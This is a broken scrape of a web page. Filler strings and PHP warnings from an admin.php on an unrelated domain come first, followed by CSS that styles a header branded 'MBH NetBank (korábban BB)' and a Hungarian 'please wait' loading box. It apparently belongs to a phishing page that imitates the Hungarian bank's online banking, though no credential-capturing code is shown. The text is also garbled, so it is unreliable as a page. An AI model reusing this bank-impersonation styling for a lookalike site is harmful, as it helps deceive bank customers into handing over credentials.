???
123123123123
.....................................................................................................................................???
123123123123
.....................................................................................................................................
Warning: Undefined variable $auth in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Trying to access array offset on null in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 188
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 189
*{
box-sizing: border-box;
font-family: 'Open Sans', arial, sans-serif;
}
body{
margin: 0%;
}
header{
width: 100%;
background-image: linear-gradient(79.68deg, #203667 0%, #59B9C3 100%);
position: sticky;
box-shadow: 2px 0 7px rgba(0, 0, 0, 0.4);
top: 0;
}
header .inner{
width: 762px;
height: 80px;
margin: 0 auto;
padding: 0 15px;
display: flex;
align-items: center;
}
@media (max-width: 768px) {
header .inner {
width: inherit !important;
}
}
header .inner .logo{
margin-right: 20px;
}
header .inner .logo-text {
font-size: 0.875rem;
color: #FFFFFF;
text-decoration: none;
font-weight: 700;
}
header .inner .logo-text::before {
content: "MBH NetBank (korábban BB)";
}
main .load{
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
background-color: #eee;
border-radius: 10px;
width: 100px;
height: 90px;
display: flex;
flex-direction: column;
align-items: center;
padding: 8px 0;
}
main .load div:last-child{
font-size: 12px;
text-wrap: nowrap;
}
main .load div:last-child::before{
content: "Kérem várjon...";
}